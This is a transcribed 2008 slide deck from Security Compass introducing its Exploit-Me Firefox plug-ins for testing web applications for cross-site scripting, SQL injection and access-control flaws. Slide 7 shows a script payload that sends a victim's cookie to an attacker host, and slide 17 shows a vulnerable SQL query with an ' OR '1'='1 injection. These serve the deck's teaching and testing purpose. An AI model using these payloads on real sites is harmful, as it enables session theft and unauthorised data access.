© 2008 security compass inc. 1 firefox plug-ins for application penetration testing exploit-me
TRANSCRIPT
![Page 1: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/1.jpg)
© 2008 Security Compass inc. © 2008 Security Compass inc. 1
Firefox Plug-ins for Application Penetration Testing
Exploit-Me
![Page 2: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/2.jpg)
© 2008 Security Compass inc.
• Tom Aratyn–Software Developer at Security
Compass–Developed the Exploit Me tools
Who are we?
2
![Page 3: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/3.jpg)
© 2008 Security Compass inc.
• Jamie–Security Consultant for Security
Compass–Background in security research,
penetration testing, and software development
Who are we?
3
![Page 4: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/4.jpg)
© 2008 Security Compass inc.
• Cross-site scripting, really a danger?
• State of web application security• XSS-Me• SQL Inject-Me• Access Me
Agenda
4
![Page 5: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/5.jpg)
© 2008 Security Compass inc.
• We know XSS can be dangerous, but can we use it to rob a bank?–AJAX + CSRF + XSS = Major
problem
XSS – Really a Danger?
5
![Page 6: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/6.jpg)
© 2008 Security Compass inc.
• Reflected–Spit back as soon as it goes in–XSS-Me helps here
• Stored–Saving it for someone else–XSS-Me future version
Two Exciting Flavours
6
![Page 7: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/7.jpg)
© 2008 Security Compass inc.
• Un-validated user input executed by the users computer
• JavaScript is typically used–PDF files are XSS-able
• Someone took my cookie
What is this XSS Stuff
7
<SCRIPT>location.href=“http://10.1.1.1/cgi-bin/steal.cgi?”+
escape(document.cookie);</SCRIPT>
<SCRIPT>location.href=“http://10.1.1.1/cgi-bin/steal.cgi?”+
escape(document.cookie);</SCRIPT>
![Page 8: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/8.jpg)
© 2008 Security Compass inc.
• AJAX is adding a new element into these attacks–AJAX was used in the IBDBank
attack• Attacker can play with data as if
the victim is doing it–Send–Receive–Parse
Someone Changed my App
8
![Page 9: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/9.jpg)
© 2008 Security Compass inc.
State of Web App Insecurity
9
• Web app exploits outnumber buffer overflows in CVE
• Large portion of web apps suffer from XSS or SQL Injection
![Page 10: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/10.jpg)
© 2008 Security Compass inc.
• Various tools exist–OWASP tools,
commercial, Open Source
• Work very well–For what they
were built to do
Testing Tools
10
![Page 11: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/11.jpg)
© 2008 Security Compass inc.
• Most tools not for developers or QA
• Developers and QA must be checking for security vulnerabilities
• Need lightweight tools
The Missing Piece
11
![Page 12: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/12.jpg)
© 2008 Security Compass inc.
• Firefox extension to test for cross-site scripting
XSS-Me 0.4 to the Rescue
12
![Page 13: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/13.jpg)
© 2008 Security Compass inc.
• Pick forms & fields to test• Firefox 3• Import/export/add/remove XSS
strings• Test & Surf• Heuristics to limit tests
XSS-Me Features
13
![Page 14: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/14.jpg)
© 2008 Security Compass inc.
• Checking all attacks against all fields is slow.–No, trust me, it’s slow
• Heuristic tests limit the fields we have to check by determining if we can inject them–Passes set of characters and
checks if they’re returned (;\/<>=‘”)
Heuristics?
14
![Page 15: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/15.jpg)
© 2008 Security Compass inc.
• Attempts to set document.vulnerable=true into the DOM
• If property set, attack worked• Also checks for plain text string,
a potential vulnerability–OnMouseOver injection
Behind the Magic
15
![Page 16: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/16.jpg)
© 2008 Security Compass inc.
• Everyone says use Struts to protect yourself–Sure, just don’t follow the supplied
examples
Thank $deity for Struts
16
![Page 17: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/17.jpg)
© 2008 Security Compass inc.
Being Bobby
17
sql = “SELECT * FROM users WHERE username = ‘” & Request(“username”) & “’ AND password = '" & Request(“password”) & "'"
User Input:username = jimmypassword = blah’ OR ‘1’=‘1
SELECT * FROM users WHERE username = ‘jimmy’ AND password = ‘blah’ OR ‘1’=‘1’
Since “WHERE 1=1” is true for all records the entire table is returned!
Courtesy XKCD.com
![Page 18: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/18.jpg)
© 2008 Security Compass inc.
• Defence is well known and faster than what you’re doing now–Prepared Statements–Stored Procedure
• Ok, if you use exec in your procedure this is also vulnerable, but, you’re not doing that right?
No Excuse
18
![Page 19: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/19.jpg)
© 2008 Security Compass inc.
• Firefox extension to check for SQL injection
SQL Inject-Me 0.4
19
![Page 20: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/20.jpg)
© 2008 Security Compass inc.
• Pick what you test• Configure attack and success
strings• Large default string set• Firefox 3• Test & Surf
SQL Inject-Me Features
20
![Page 21: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/21.jpg)
© 2008 Security Compass inc.
• Web/application servers maybe vulnerable to HTTP Verb Tampering attacks
• Bypasses common authorization configurations
What’s your method
21
![Page 22: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/22.jpg)
© 2008 Security Compass inc.
Access Me 0.2
22
• Firefox extension to check for authentication issues
![Page 23: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/23.jpg)
© 2008 Security Compass inc.
• Checks for unauthenticated access vulnerabilities
• Checks for HTTP verb vulnerabilities
• Regular expression based parameter detection
• Automatic test as you surf
Access Me Features
23
![Page 24: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/24.jpg)
© 2008 Security Compass inc.
Detecting Access Vulnerabilities
24
• Failed if response status is 200 and response too similar
• Warning if response status is 200 or response too similar
![Page 25: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/25.jpg)
© 2008 Security Compass inc.
• Available off of our website–www.securitycompass.com
• Extra XSS-Me attack strings also available from site
• Open sourced under GPL v3
Where can you get ‘em
25
![Page 26: © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me](https://reader035.vdocument.in/reader035/viewer/2022062620/551b3dcb550346dd1a8b5506/html5/thumbnails/26.jpg)
© 2008 Security Compass inc.
• May include–Spidering
• Stored attacks
The Future...
26